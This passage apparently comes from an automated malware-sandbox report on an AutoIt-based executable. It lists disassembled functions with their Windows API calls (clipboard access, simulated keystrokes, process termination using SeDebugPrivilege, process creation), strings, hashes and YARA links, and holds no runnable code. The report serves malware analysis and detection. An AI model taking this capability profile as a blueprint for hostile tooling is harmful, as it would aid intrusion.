                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: File$HandleModuleNameWrite_strlen
                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                    • API String ID: 2384599179-4022980321
                                                    • Opcode ID: dfda354b8672cee083a54fdc8afc5b122638169036b185a38dddd5bdb5c0500e
                                                    • Instruction ID: 864905d4ace1a0a0173b94da99cba76a6cae059a2f40e2abec29510ee60198cc
                                                    • Opcode Fuzzy Hash: dfda354b8672cee083a54fdc8afc5b122638169036b185a38dddd5bdb5c0500e
                                                    • Instruction Fuzzy Hash: CE417A32B40BBAB6D713366A9C06FFF375CAB52715F11033AFE45A50C1EA616A0442A6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041FCB1, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 78windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003FE6C9,00000010,?,Bad directive syntax error,0044F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0041FCD2
                                                    • LoadStringW.USER32(00000000,?,003FE6C9,00000010), ref: 0041FCD9
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0041FD9D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 2734547477-4153970271
                                                    • Opcode ID: 9fde7321ac215e2a8071c0bddb3b864c7d13eda59fbed6c4675b3e6de049b8c8
                                                    • Instruction ID: c43fcede311f1e9a9741da49c50bea447c2882fb4648c7fcbe8ef63725a63b16
                                                    • Opcode Fuzzy Hash: 9fde7321ac215e2a8071c0bddb3b864c7d13eda59fbed6c4675b3e6de049b8c8
                                                    • Instruction Fuzzy Hash: 1B21513290421AEBDF13EBA0DC4AFFE7739FF14300F04446AF509660A1DA36AA59DB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00419645, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00419651
                                                    • GetClassNameW.USER32 ref: 00419666
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004196F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1290815626-3381328864
                                                    • Opcode ID: 3f93c9f1be0e05119ecbf03781cc0ef7bf29a950f5b5e3329fc16c52cc9ec83e
                                                    • Instruction ID: 64ce08483f85e077b52c5f5119e9ddb8a4a24809dcb03247f88140e7cad1fff5
                                                    • Opcode Fuzzy Hash: 3f93c9f1be0e05119ecbf03781cc0ef7bf29a950f5b5e3329fc16c52cc9ec83e
                                                    • Instruction Fuzzy Hash: 05110A77244367BAFA022621EC2BDE7779CDB11370B300127F504A50D1FE6A6D91866D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00438F5B, Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0044F910), ref: 0043903D
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0044F910), ref: 00439071
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004391EB
                                                    • SysFreeString.OLEAUT32(?), ref: 00439215
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                    • String ID:
                                                    • API String ID: 560350794-0
                                                    • Opcode ID: 1afc697ae5d917333e8ab0afe7dba3bb98b85727d433fef2fca7c0ec1ad4055f
                                                    • Instruction ID: a6eb0621bc5fb2c36f7a327142a2b2c45ac81881bc858121f8b4fca47b09ef8b
                                                    • Opcode Fuzzy Hash: 1afc697ae5d917333e8ab0afe7dba3bb98b85727d433fef2fca7c0ec1ad4055f
                                                    • Instruction Fuzzy Hash: 61F15F75A00209EFDF04DF94C888EAEB7B9FF49314F10809AF915AB250CB75AE46CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004488B4, Relevance: 13.7, APIs: 9, Instructions: 170COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0044896E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 3668373e3f6da86c9678b5ee0b75fb11cbbcf80346cb6de13d6847eef6406a4f
                                                    • Instruction ID: ec7cb9e6d78a5b390c0ccf4cac018509c0559e5c193d36c1fe0518f14128ef4a
                                                    • Opcode Fuzzy Hash: 3668373e3f6da86c9678b5ee0b75fb11cbbcf80346cb6de13d6847eef6406a4f
                                                    • Instruction Fuzzy Hash: 2A518330600208BFFF21AF24CC85BAE7BA5FB05354F50452FF515E66A1CFB9A9809B59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C2B72, Relevance: 13.7, APIs: 9, Instructions: 166windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadImageW.USER32 ref: 003FC547
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003FC569
                                                    • LoadImageW.USER32 ref: 003FC581
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003FC59F
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003FC5C0
                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,003D259D,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003FC5CF
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003FC5EC
                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,003D259D,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003FC5FB
                                                      • Part of subcall function 0044A71E: DeleteObject.GDI32(00000000), ref: 0044A757
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                    • String ID:
                                                    • API String ID: 2819616528-0
                                                    • Opcode ID: ad07a34c504c0df14d56d5c27b86c5226a5227db3816ab0aecba78b41631bfd4
                                                    • Instruction ID: 910bb3ab306d927128b7ec0dddc4a40f03eaf3f4e26ba8cf7cc14013c1ddcd78
                                                    • Opcode Fuzzy Hash: ad07a34c504c0df14d56d5c27b86c5226a5227db3816ab0aecba78b41631bfd4
                                                    • Instruction Fuzzy Hash: 37518474A50208AFDB25DF25DC45FAB3BB8EB59360F11452DF906E76A0CB70AD80DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00434458, Relevance: 13.6, APIs: 9, Instructions: 83clipboardmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: bafed15f46f3f6b02c6f098041c4bf2e0a58087ae727ee62e87bc68eb763522e
                                                    • Instruction ID: 91dcc5aca28bec3a2440fcef6b5fdf431d98cce272a50eb5186b301bd45a4e86
                                                    • Opcode Fuzzy Hash: bafed15f46f3f6b02c6f098041c4bf2e0a58087ae727ee62e87bc68eb763522e
                                                    • Instruction Fuzzy Hash: 8321B439200210AFDB11AF10EC09B6E77A8EF49711F11807BF90ADB261DB74AC01CB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00419B50, Relevance: 13.6, APIs: 9, Instructions: 68sleepkeyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041AE57: GetWindowThreadProcessId.USER32(00000005,00000000), ref: 0041AE77
                                                      • Part of subcall function 0041AE57: GetCurrentThreadId.KERNEL32 ref: 0041AE7E
                                                      • Part of subcall function 0041AE57: AttachThreadInput.USER32(00000000,?,00419B65,?,00000001,?,?,?,?,?,00443940,00000001), ref: 0041AE85
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00419B70
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00419B8D
                                                    • Sleep.KERNEL32(00000000,?,?,?,00443940,00000001), ref: 00419B90
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00419B99
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00419BB7
                                                    • Sleep.KERNEL32(00000000,?,?,?,00443940,00000001), ref: 00419BBA
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00419BC3
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00419BDA
                                                    • Sleep.KERNEL32(00000000,?,?,?,00443940,00000001), ref: 00419BDD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: ff79d0939ccda769024aca37730c0f0b61ceb6c31b08f23d59e38aa2eaab2ea2
                                                    • Instruction ID: 86499955414786ebee73e77e255c55a595a7b0c5353282d83f3b9fd6f755e3f0
                                                    • Opcode Fuzzy Hash: ff79d0939ccda769024aca37730c0f0b61ceb6c31b08f23d59e38aa2eaab2ea2
                                                    • Instruction Fuzzy Hash: CF110875550618BEF6102B60EC49FAA3F1DEB4D799F110426F244AB0A0C9F36C51DAB8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418E03, Relevance: 13.6, APIs: 9, Instructions: 51memorythreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E0C
                                                    • HeapAlloc.KERNEL32(00000000,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E13
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E28
                                                    • GetCurrentProcess.KERNEL32(00479544,00000000,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E30
                                                    • DuplicateHandle.KERNEL32(00000000,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E33
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E43
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E4B
                                                    • DuplicateHandle.KERNEL32(00000000,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E4E
                                                    • CreateThread.KERNEL32 ref: 00418E68
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 97ee80b51115b11de5df2ab420e908640f6661632254269bb645b285dc893fb1
                                                    • Instruction ID: 94894ec6b40fc2c3a919c651c2471b2ff25e1584b69fd1ecc59c97f9283bdab2
                                                    • Opcode Fuzzy Hash: 97ee80b51115b11de5df2ab420e908640f6661632254269bb645b285dc893fb1
                                                    • Instruction Fuzzy Hash: 6C01A8BA240308FFE610ABA5DC49F6B3BACEB8A755F114421F605DA1A0CA759C048B24
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00439428, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 271COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Variant$ClearInit
                                                    • String ID: ,,E$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2610073882-3165839431
                                                    • Opcode ID: 7344640d717bf16ea48d86d46a43080127d564a948a29922caf7bbe44a967a40
                                                    • Instruction ID: 71090b3c4917ca7eb042b450a79f0a816646f0946dc961677b6a08ca4920edd2
                                                    • Opcode Fuzzy Hash: 7344640d717bf16ea48d86d46a43080127d564a948a29922caf7bbe44a967a40
                                                    • Instruction Fuzzy Hash: 1F91AE71900215ABDB21DFA5DC49FAFBBB8EF49314F10811AF505AB280D7B49D45CFA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043F9A8, Relevance: 12.4, APIs: 8, Instructions: 404processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0043FB5C
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0043FB80
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0043FBC0
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0043FBE2
                                                    • CreateProcessW.KERNEL32 ref: 0043FD5E
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0043FD90
                                                    • CloseHandle.KERNEL32(?), ref: 0043FDBF
                                                    • CloseHandle.KERNEL32(?), ref: 0043FE36
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 2947177986-0
                                                    • Opcode ID: 11caf3e97a4e0a536ddb1fcecf9a364c2385a72e1178e7923f1afac4ec619338
                                                    • Instruction ID: f703b15afc6b2587d97322182f8cfedd0b0c4308b3bc8598124d2befb44119b9
                                                    • Opcode Fuzzy Hash: 11caf3e97a4e0a536ddb1fcecf9a364c2385a72e1178e7923f1afac4ec619338
                                                    • Instruction Fuzzy Hash: B1E1C0316042409FC715EF24D885B6BBBE4EF89354F14982EF4898F2A2CB35EC48CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043EC47, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00423E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00423EB6
                                                      • Part of subcall function 00423E91: Process32FirstW.KERNEL32(00000000,?), ref: 00423EC4
                                                      • Part of subcall function 00423E91: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00423F8E
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0043ECB8
                                                    • GetLastError.KERNEL32 ref: 0043ECCB
                                                    • OpenProcess.KERNEL32(00000001,00000000,?,?,SeDebugPrivilege), ref: 0043ECFA
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043ED77
                                                    • GetLastError.KERNEL32(00000000), ref: 0043ED82
                                                    • CloseHandle.KERNEL32(00000000), ref: 0043EDB7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 1701285019-2896544425
                                                    • Opcode ID: 944c00616f1a32bbbf529eaa5bd9c38e35a61069ff07cee256772286b901c43f
                                                    • Instruction ID: 6c14bab079c75707f6954f299ed43a476ee9d26feaa8d1426ea2cbfb960cb7af
                                                    • Opcode Fuzzy Hash: 944c00616f1a32bbbf529eaa5bd9c38e35a61069ff07cee256772286b901c43f
                                                    • Instruction Fuzzy Hash: 2041AB312002019FDB11EF25C895F6EB7A4AF45714F08802EF8469F3C2DBB8AC04CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00423226, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 86windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 004232C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 91d835fe306ec04fa4ca842eb9fa3e7ba23d541c0e6f14639e9cf52c20f22163
                                                    • Instruction ID: bd4a49d420b6bcc4a1fe5a0b14bf05ef3e98574381385f99f096d0aa13b7b811
                                                    • Opcode Fuzzy Hash: 91d835fe306ec04fa4ca842eb9fa3e7ba23d541c0e6f14639e9cf52c20f22163
                                                    • Instruction Fuzzy Hash: 7D2126323093A5FAE7015E50FC42DABA7ACDF15776B21009BF0046A2C1D66E2B0145BE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004248F3, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 642191829-3771769585
                                                    • Opcode ID: 4d962c5b5ca8beb6a7104837c61cc5d75144bffb9762fcd5faf0b1c81e18dc7a
                                                    • Instruction ID: e61693dffff33a30c9c5ce6087385d13b44ed15976e644257705db43c9660ad8
                                                    • Opcode Fuzzy Hash: 4d962c5b5ca8beb6a7104837c61cc5d75144bffb9762fcd5faf0b1c81e18dc7a
                                                    • Instruction Fuzzy Hash: 1D210875604134AADB21EB71FD0AEDF77BCDB81721F400177F04495091EF789AC58669
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00427C1A, Relevance: 12.3, APIs: 8, Instructions: 299COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00427CF6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ArraySafeVartype
                                                    • String ID:
                                                    • API String ID: 1725837607-0
                                                    • Opcode ID: d541b25ffe9e3d823eab5f28f0b740650fe5af0fe93688a506e1457056e68c3e
                                                    • Instruction ID: a6d44a9683c3cfe4b6c32c31d66501a16505427ec1a43f0145696ffc7db36222
                                                    • Opcode Fuzzy Hash: d541b25ffe9e3d823eab5f28f0b740650fe5af0fe93688a506e1457056e68c3e
                                                    • Instruction Fuzzy Hash: A2B1D471A0822A9FDB10DFA4E884BBFB7B4FF09321F61406AE500E7241D7789941CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044D74C, Relevance: 12.3, APIs: 8, Instructions: 262windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • GetSystemMetrics.USER32 ref: 0044D78A
                                                    • GetSystemMetrics.USER32 ref: 0044D7AA
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0044D9E5
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0044DA03
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0044DA24
                                                    • ShowWindow.USER32(00000003,00000000), ref: 0044DA43
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0044DA68
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0044DA8B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID:
                                                    • API String ID: 1211466189-0
                                                    • Opcode ID: 074d1e455e7af51d1479f041ef3fc9469120db81b2ef715ec20bb8c979279418
                                                    • Instruction ID: a98c711bef2bce3382779e4655d0636e10efb226638ccd533ae476d700dbc201
                                                    • Opcode Fuzzy Hash: 074d1e455e7af51d1479f041ef3fc9469120db81b2ef715ec20bb8c979279418
                                                    • Instruction Fuzzy Hash: B9B19C75A00215EFEF14CF68C9C57BE7BB1FF04701F08806AEC48AA295D738A950CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C2A5B, Relevance: 12.1, APIs: 8, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,?,?,00000000,?,003FC417,00000004,00000000,00000000,00000000,000000FF), ref: 003C2ACF
                                                    • ShowWindow.USER32(FFFFFFFF,?,?,00000000,?,003FC417,00000004,00000000,00000000,00000000,000000FF), ref: 003C2B17
                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,003FC417,00000004,00000000,00000000,00000000,000000FF), ref: 003FC46A
                                                    • ShowWindow.USER32(FFFFFFFF,?,?,00000000,?,003FC417,00000004,00000000,00000000,00000000,000000FF), ref: 003FC4D6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
